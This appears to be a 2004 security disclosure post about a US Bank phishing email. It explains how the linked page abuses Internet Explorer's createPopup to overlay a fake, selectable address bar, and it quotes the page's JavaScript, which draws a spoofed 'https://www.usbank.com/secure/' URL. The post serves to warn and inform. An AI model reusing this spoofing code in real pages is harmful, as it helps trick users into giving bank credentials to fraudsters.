One of our developers (Laurentiu Nicula) received an alarming type of phishing attack today. received: from UsBank.com ([82.33.97.75]) [82.33.97.75 = [ 82-33-97-75.cable.ubr10.azte.blueyonder.co.uk ] The email looks legitimate enough, but links to: http://validation-required.info/ The webpage attempts to throw up a little url bar of it's own which covers IE's url bar. This allows a pretty convincing spoof job to happen. The pop up looks just like IE's url bar, and it is even selectable. This does not work in Netscape. It is very similiar to Malware's issues of late. He protected the source pretty well, but it reveals some interesting code which I googled to some Italian guy here (post made in December of last year): http://tool.freeonline.it/forum/read.php?f=8&i=361&t=361 Here is the vulnerable code page: HTTP/1.1 200 OK Date: Thu, 13 May 2004 22:19:10 GMT Server: Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a Last-Modified: Wed, 12 May 2004 03:47:59 GMT ETag: "1da80c8-388-40a19e6f" Accept-Ranges: bytes Content-Length: 904 Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Content-Type: text/html var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+72; vuln_y= window.screenTop-20; vuln_w= root.offsetWidth-520; vuln_h= 17; vuln_show(); } var vuln_win; function vuln_pop() { vuln_win= window.createPopup(); vuln_win.document.body.innerHTML= vuln_html; vuln_win.document.body.style.margin= 0; vuln_win.document.body.onunload= vuln_pop; vuln_show(); } function vuln_show() { if (vuln_win) vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h); } var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://www.usbank.com/secure/-run\x3C/div>'
